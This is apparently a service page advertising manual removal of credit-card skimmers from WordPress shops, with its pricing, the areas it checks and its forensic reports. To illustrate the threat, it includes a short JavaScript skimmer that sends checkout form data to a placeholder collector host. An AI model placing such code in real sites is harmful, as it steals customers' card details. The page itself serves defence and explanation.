CARD SKIMMER · WORDPRESS · REMOVED
WordPress credit card skimmer removal.
Manual removal of the card skimmer. I find the entry point and write a report your acquirer can read. Flat $279.
MECHANISM
A few lines of JavaScript can steal every order.
A card skimmer is a tiny piece of JavaScript that listens to your checkout form. Every time a customer types their card number, the skimmer makes a copy and sends it to an address the attacker controls — usually a server that looks innocent from the outside.
The page still works. The order still goes through. Nothing looks wrong to the customer or to you. I reproduce the order in a sandbox, trace the script back to where it lives in your site, and remove it without breaking the rest of the checkout.
01 document.querySelector('form.checkout').addEventListener('submit', function (e) { 02 const data = new FormData(e.target); 03 fetch('https://collector.example/c', { 04 method: 'POST', body: data, mode: 'no-cors' 05 }); 06 }); 07 08 // A fetch to an external host on form submit is the signature.
What I remove
Every place a skimmer can hide.
-
TRIAGE
I place a test order in a sandbox and watch every network call the checkout makes.
-
JAVASCRIPT
Theme files, plugin assets, and inline scripts reviewed. Anything sending form data off-domain — pulled.
-
DATABASE
Injected scripts in wp_options, wp_posts, and active widgets — purged. Persistence removed.
-
SERVER
PHP backdoors that re-install the skimmer hunted down. Cron jobs and must-use plugins checked.
-
TIMELINE
First-seen and last-seen dates established so you know which orders were exposed.
-
REPORT
Plain-English forensic write-up suitable for acquirers and insurers. Entry vector named.
Pricing
Cleanup
$279
flat, one-time, per site
Manual cleanup, entry-vector identification, written forensic report.
Start a cleanupMonitoring
$29 / mo
per site, cancel any time
Continuous monitoring, hardening, one cleanup per year included.
Get protectedPart of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.
See all services →Email [email protected] or use the contact form.